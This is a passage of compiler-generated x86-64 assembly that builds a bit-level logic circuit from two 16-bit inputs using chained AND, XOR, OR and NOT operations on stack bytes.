## kill: def $al killed $al killed $eax movb %al, -1219(%rbp) movzwl -4(%rbp), %eax sarl $8, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $13, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1218(%rbp) movzwl -4(%rbp), %eax sarl $7, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $14, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1213(%rbp) movzwl -4(%rbp), %eax sarl $7, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $15, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -548(%rbp) movzwl -4(%rbp), %eax sarl $4, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $5, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -401(%rbp) movzwl -4(%rbp), %eax sarl $6, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $3, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -424(%rbp) movzwl -4(%rbp), %eax sarl $5, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $4, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -425(%rbp) movzwl -4(%rbp), %eax sarl $3, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $6, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -400(%rbp) movzwl -4(%rbp), %eax sarl $15, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $7, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -155(%rbp) movzwl -4(%rbp), %eax sarl $14, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $8, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -975(%rbp) movzwl -4(%rbp), %eax sarl $13, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $9, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -976(%rbp) movzwl -4(%rbp), %eax sarl $12, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $10, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -973(%rbp) movzwl -4(%rbp), %eax sarl $11, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $11, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -974(%rbp) movzwl -4(%rbp), %eax sarl $10, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $12, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -978(%rbp) movzwl -4(%rbp), %eax sarl $9, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $13, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -979(%rbp) movzwl -4(%rbp), %eax sarl $8, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $14, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -977(%rbp) movzwl -4(%rbp), %eax sarl $8, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $15, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -518(%rbp) movzwl -4(%rbp), %eax sarl $13, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $10, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1214(%rbp) movzbl -425(%rbp), %eax movzbl -424(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1239(%rbp) movzbl -899(%rbp), %eax movzbl -898(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -897(%rbp) movzbl -899(%rbp), %eax movzbl -898(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -362(%rbp) movzbl -151(%rbp), %eax movzbl -152(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -918(%rbp) movzbl -151(%rbp), %eax movzbl -152(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -501(%rbp) movzbl -302(%rbp), %eax movzbl -303(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -511(%rbp) movzbl -302(%rbp), %eax movzbl -303(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -672(%rbp) movzbl -676(%rbp), %eax movzbl -675(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -678(%rbp) movzbl -676(%rbp), %eax movzbl -675(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1153(%rbp) movzbl -830(%rbp), %eax movzbl -829(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1139(%rbp) movzbl -830(%rbp), %eax movzbl -829(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1004(%rbp) movzbl -953(%rbp), %eax movzbl -954(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -951(%rbp) movzbl -953(%rbp), %eax movzbl -954(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -374(%rbp) movzbl -408(%rbp), %eax movzbl -409(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -406(%rbp) movzbl -408(%rbp), %eax movzbl -409(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1054(%rbp) movzbl -110(%rbp), %eax movzbl -111(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1009(%rbp) movzbl -110(%rbp), %eax movzbl -111(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1117(%rbp) movzbl -446(%rbp), %eax movzbl -1116(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1115(%rbp) movzbl -446(%rbp), %eax movzbl -1116(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -148(%rbp) movzbl -1061(%rbp), %eax movzbl -454(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1062(%rbp) movzbl -165(%rbp), %eax movzbl -164(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -163(%rbp) movzbl -153(%rbp), %eax movzbl -920(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1196(%rbp) movzbl -162(%rbp), %eax movzbl -1061(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -161(%rbp) movzwl -4(%rbp), %eax sarl $15, %eax andl $1, %eax movzbl -857(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -858(%rbp) movzwl -2(%rbp), %eax sarl $5, %eax andl $1, %eax movzbl -920(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -856(%rbp) movzbl -162(%rbp), %eax movzbl -1061(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -371(%rbp) movzbl -425(%rbp), %eax movzbl -424(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -67(%rbp) movzbl -163(%rbp), %eax movzbl -1062(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -922(%rbp) movzbl -401(%rbp), %eax movzbl -371(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1232(%rbp) movzbl -401(%rbp), %eax movzbl -67(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1231(%rbp) movzbl -67(%rbp), %eax movzbl -371(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1230(%rbp) movzbl -896(%rbp), %eax movzbl -1239(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1240(%rbp) movzbl -896(%rbp), %eax movzbl -1239(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -359(%rbp) movzbl -896(%rbp), %eax movzbl -897(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -360(%rbp) movzbl -897(%rbp), %eax movzbl -1239(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -357(%rbp) movzbl -154(%rbp), %eax movzbl -362(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -361(%rbp) movzbl -154(%rbp), %eax movzbl -362(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -504(%rbp) movzbl -154(%rbp), %eax movzbl -918(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -505(%rbp) movzbl -918(%rbp), %eax movzbl -362(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -502(%rbp) movzbl -510(%rbp), %eax movzbl -501(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -500(%rbp) movzbl -510(%rbp), %eax movzbl -501(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -309(%rbp) movzbl -510(%rbp), %eax movzbl -511(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -308(%rbp) movzbl -511(%rbp), %eax movzbl -501(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -673(%rbp) movzbl -677(%rbp), %eax movzbl -672(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -671(%rbp) movzbl -677(%rbp), %eax movzbl -672(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1150(%rbp) movzbl -677(%rbp), %eax movzbl -678(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1149(%rbp) movzbl -678(%rbp), %eax movzbl -672(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1152(%rbp) movzbl -1140(%rbp), %eax movzbl -1153(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1154(%rbp) movzbl -1140(%rbp), %eax movzbl -1153(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1006(%rbp) movzbl -1140(%rbp), %eax movzbl -1139(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1007(%rbp) movzbl -1139(%rbp), %eax movzbl -1153(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1068(%rbp) movzbl -952(%rbp), %eax movzbl -1004(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1003(%rbp) movzbl -952(%rbp), %eax movzbl -1004(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -68(%rbp) movzbl -952(%rbp), %eax movzbl -951(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -69(%rbp) movzbl -951(%rbp), %eax movzbl -1004(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -398(%rbp) movzbl -407(%rbp), %eax movzbl -374(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -57(%rbp) movzbl -407(%rbp), %eax movzbl -374(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -999(%rbp) movzbl -407(%rbp), %eax movzbl -406(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1000(%rbp) movzbl -406(%rbp), %eax movzbl -374(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1057(%rbp) movzbl -1008(%rbp), %eax movzbl -1054(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1048(%rbp) movzbl -1008(%rbp), %eax movzbl -1054(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -207(%rbp) movzbl -1008(%rbp), %eax movzbl -1009(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1113(%rbp) movzbl -1009(%rbp), %eax movzbl -1054(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1114(%rbp) movzbl -1118(%rbp), %eax movzbl -1117(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1112(%rbp) movzbl -1118(%rbp), %eax movzbl -1117(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -143(%rbp) movzbl -1118(%rbp), %eax movzbl -1115(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -144(%rbp) movzbl -1115(%rbp), %eax movzbl -1117(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -149(%rbp) movzbl -153(%rbp), %eax movzbl -148(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -147(%rbp) movzbl -160(%rbp), %eax movzbl -1062(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -159(%rbp) movzbl -153(%rbp), %eax movzbl -148(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1195(%rbp) movzbl -920(%rbp), %eax movzbl -148(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1201(%rbp) movzbl -856(%rbp), %eax xorl $-1, %eax movzbl -858(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -859(%rbp) movzbl -160(%rbp), %eax movzbl -1062(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -62(%rbp) movzbl -160(%rbp), %eax movzbl -161(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -61(%rbp) movzbl -161(%rbp), %eax movzbl -1062(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -56(%rbp) movzbl -490(%rbp), %eax movzbl -858(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1221(%rbp) movzwl -2(%rbp), %eax sarl $6, %eax andl $1, %eax movzbl -858(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1223(%rbp) movzbl -401(%rbp), %eax movzbl -371(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -58(%rbp) movzbl -161(%rbp), %eax movzbl -159(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -202(%rbp) movzbl -155(%rbp), %eax xorl $-1, %eax movzbl -1221(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -429(%rbp) movzbl -1231(%rbp), %eax movzbl -1232(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1233(%rbp) movzbl -897(%rbp), %eax movzbl -1240(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1229(%rbp) movzbl -360(%rbp), %eax movzbl -359(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -354(%rbp) movzbl -918(%rbp), %eax movzbl -361(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -358(%rbp) movzbl -505(%rbp), %eax movzbl -504(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -507(%rbp) movzbl -511(%rbp), %eax movzbl -500(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -503(%rbp) movzbl -308(%rbp), %eax movzbl -309(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -310(%rbp) movzbl -678(%rbp), %eax movzbl -671(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -674(%rbp) movzbl -1149(%rbp), %eax movzbl -1150(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1147(%rbp) movzbl -1139(%rbp), %eax movzbl -1154(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1151(%rbp) movzbl -1007(%rbp), %eax movzbl -1006(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1013(%rbp) movzbl -951(%rbp), %eax movzbl -1003(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1071(%rbp) movzbl -69(%rbp), %eax movzbl -68(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -64(%rbp) movzbl -406(%rbp), %eax movzbl -57(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -128(%rbp) movzbl -1000(%rbp), %eax movzbl -999(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1002(%rbp) movzbl -1009(%rbp), %eax movzbl -1048(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1005(%rbp) movzbl -1113(%rbp), %eax movzbl -207(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -208(%rbp) movzbl -1115(%rbp), %eax movzbl -1112(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1111(%rbp) movzbl -144(%rbp), %eax movzbl -143(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -895(%rbp) movzbl -920(%rbp), %eax movzbl -147(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -150(%rbp) movzbl -1196(%rbp), %eax movzbl -1195(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1198(%rbp) movzbl -61(%rbp), %eax movzbl -62(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -59(%rbp) movzbl -1202(%rbp), %eax movzbl -859(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -878(%rbp) movzbl -1223(%rbp), %eax movzbl -1221(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -885(%rbp) movzbl -67(%rbp), %eax movzbl -58(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -55(%rbp) movzbl -155(%rbp), %eax movzbl -1221(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -927(%rbp) movzbl -422(%rbp), %eax xorl $-1, %eax movzbl -429(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -428(%rbp) movzwl -2(%rbp), %eax sarl $8, %eax andl $1, %eax movzbl -429(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -423(%rbp) movzbl -1230(%rbp), %eax xorl $-1, %eax movzbl -1233(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1234(%rbp) movzbl -893(%rbp), %eax movzbl -1229(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -718(%rbp) movzbl -357(%rbp), %eax xorl $-1, %eax movzbl -354(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -353(%rbp) movzbl -158(%rbp), %eax movzbl -358(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -845(%rbp) movzbl -502(%rbp), %eax xorl $-1, %eax movzbl -507(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -506(%rbp) movzbl -301(%rbp), %eax movzbl -503(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -315(%rbp) movzbl -673(%rbp), %eax xorl $-1, %eax movzbl -310(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -311(%rbp) movzbl -667(%rbp), %eax movzbl -674(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -815(%rbp) movzbl -1152(%rbp), %eax xorl $-1, %eax movzbl -1147(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1148(%rbp) movzbl -831(%rbp), %eax movzbl -1151(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -105(%rbp) movzbl -1068(%rbp), %eax xorl $-1, %eax movzbl -1013(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1012(%rbp) movzbl -956(%rbp), %eax movzbl -1071(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -82(%rbp) movzbl -398(%rbp), %eax xorl $-1, %eax movzbl -64(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -63(%rbp) movzbl -403(%rbp), %eax movzbl -128(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1096(%rbp) movzbl -1057(%rbp), %eax xorl $-1, %eax movzbl -1002(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1001(%rbp) movzbl -113(%rbp), %eax movzbl -1005(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -201(%rbp) movzbl -1114(%rbp), %eax xorl $-1, %eax movzbl -208(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -197(%rbp) movzbl -1108(%rbp), %eax movzbl -1111(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1040(%rbp) movzbl -149(%rbp), %eax xorl $-1, %eax movzbl -895(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -145(%rbp) movzbl -525(%rbp), %eax movzbl -150(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -306(%rbp) movzbl -1201(%rbp), %eax xorl $-1, %eax movzbl -1198(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1197(%rbp) movzbl -56(%rbp), %eax xorl $-1, %eax movzbl -59(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -60(%rbp) movzbl -884(%rbp), %eax movzbl -885(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -146(%rbp) movzbl -400(%rbp), %eax movzbl -55(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -418(%rbp) movzbl -975(%rbp), %eax movzbl -927(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1220(%rbp) movzbl -423(%rbp), %eax movzbl -428(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -427(%rbp) movzbl -1229(%rbp), %eax movzbl -1234(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1235(%rbp) movzbl -487(%rbp), %eax movzbl -428(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -497(%rbp) movzbl -487(%rbp), %eax xorl $-1, %eax movzbl -428(%rbp), %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -250(%rbp) movzbl -1229(%rbp), %eax movzbl -1234(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -723(%rbp) movzbl -893(%rbp), %eax movzbl -1234(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -717(%rbp) movzbl -358(%rbp), %eax movzbl -353(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -356(%rbp) movzbl -358(%rbp), %eax movzbl -353(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -842(%rbp) movzbl -158(%rbp), %eax movzbl -353(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -844(%rbp) movzbl -503(%rbp), %eax movzbl -506(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -846(%rbp) movzbl -503(%rbp), %eax movzbl -506(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -316(%rbp) movzbl -301(%rbp), %eax movzbl -506(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -314(%rbp) movzbl -674(%rbp), %eax movzbl -311(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -312(%rbp) movzbl -674(%rbp), %eax movzbl -311(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -818(%rbp) movzbl -667(%rbp), %eax movzbl -311(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -816(%rbp) movzbl -1151(%rbp), %eax movzbl -1148(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -814(%rbp) movzbl -1151(%rbp), %eax movzbl -1148(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -692(%rbp) movzbl -831(%rbp), %eax movzbl -1148(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -104(%rbp) movzbl -1071(%rbp), %eax movzbl -1012(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1011(%rbp) movzbl -1071(%rbp), %eax movzbl -1012(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -79(%rbp) movzbl -956(%rbp), %eax movzbl -1012(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -83(%rbp) movzbl -128(%rbp), %eax movzbl -63(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -66(%rbp) movzbl -128(%rbp), %eax movzbl -63(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1097(%rbp) movzbl -403(%rbp), %eax movzbl -63(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1095(%rbp) movzbl -1005(%rbp), %eax movzbl -1001(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1101(%rbp) movzbl -1005(%rbp), %eax movzbl -1001(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -14(%rbp) movzbl -113(%rbp), %eax movzbl -1001(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -196(%rbp) movzbl -1111(%rbp), %eax movzbl -197(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -198(%rbp) movzbl -1111(%rbp), %eax movzbl -197(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1041(%rbp) movzbl -1108(%rbp), %eax movzbl -197(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1039(%rbp) movzbl -150(%rbp), %eax movzbl -145(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -1053(%rbp) movzbl -150(%rbp), %eax movzbl -145(%rbp), %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -307(%rbp) movzbl -525(%rbp), %eax movzbl -145(%rbp), %ecx xorl $-1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1193(%rbp) movzbl -1202(%rbp), %eax movzbl -1197(%rbp), %ecx xorl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1192(%rbp) movzbl -55(%rbp), %eax movzbl -60(%rbp), %ecx xorl %ecx, %eax xorl $-1, %eax ## 